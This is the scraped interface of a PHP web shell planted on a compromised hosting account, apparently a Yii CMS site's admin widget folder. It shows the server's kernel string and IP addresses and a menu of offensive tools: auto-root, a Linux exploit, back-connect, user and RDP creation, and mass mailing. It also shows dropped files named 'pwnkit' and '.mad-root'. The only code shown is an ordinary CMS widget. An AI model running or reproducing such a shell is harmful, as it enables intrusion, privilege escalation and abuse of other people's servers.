Linux webd002.cluster121.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.121.40.2 | : 216.73.216.88
Cant Read [ /etc/named.conf ]
7.2.34
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
letacommog /
letaweb /
admin /
widgets /
[ HOME SHELL ]
Name
Size
Permission
Action
modules
[ DIR ]
drwx---r-x
views
[ DIR ]
drwx---r-x
.mad-root
0
B
-rw----r--
ActiveDataProvider.php
66
B
-rw----r--
CPager.php
7.65
KB
-rw----r--
CPanel.php
1.8
KB
-rw----r--
CPriceTable.php
308
B
-rw----r--
CTab.php
1.55
KB
-rw----r--
CTabContent.php
1.7
KB
-rw----r--
CWidgetCMS.php
1.27
KB
-rw----r--
CWidgetColumn.php
959
B
-rw----r--
CWidgetCustomModule.php
2.47
KB
-rw----r--
CWidgetEcommerce.php
1.64
KB
-rw----r--
CWidgetModule.php
12.34
KB
-rw----r--
CWidgetModuleRenderer.php
941
B
-rw----r--
CWidgetRow.php
156
B
-rw----r--
CWidgetStructure.php
370
B
-rw----r--
CWidgetZone.php
392
B
-rw----r--
Pagination.php
1.08
KB
-rw----r--
pwnkit
0
B
-rwx---r-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CWidgetCMS.php
<?php // base widget for all cms module class CWidgetCMS extends CWidgetModule { public $news_page; public $newsdetail_page; public $cart_page; public $checkout_page; public $cart; public $currencies; public $context; public $order; public $previewMode = false; public function init() { $this->news_page = strtolower(Yii::app()->cms->getBlogPage()); $this->newsdetail_page = Yii::app()->cms->getBlogDetailPage(); $this->context = Yii::app()->context; $this->previewMode = getIndex($this->data, 'previewMode', false, 'boolean'); parent::init(); } protected function createUrl($news) { return Yii::app()->createUrl($this->news_page, array('id' => $news)); } protected function createCategoryUrl($id) { return Yii::app()->createAbsoluteUrl($this->news_page, array('category' => $id)); } protected function createTagUrl($tag) { $rewrite = Yii::app()->cms->urlRewrite; return $rewrite->createPermanentUrl('tag', array('tag' => $tag)); } protected function createMonthUrl($month, $year) { $rewrite = Yii::app()->cms->urlRewrite; return $rewrite->createPermanentUrl('month', array('month' => $month, 'year' => $year)); } }
Close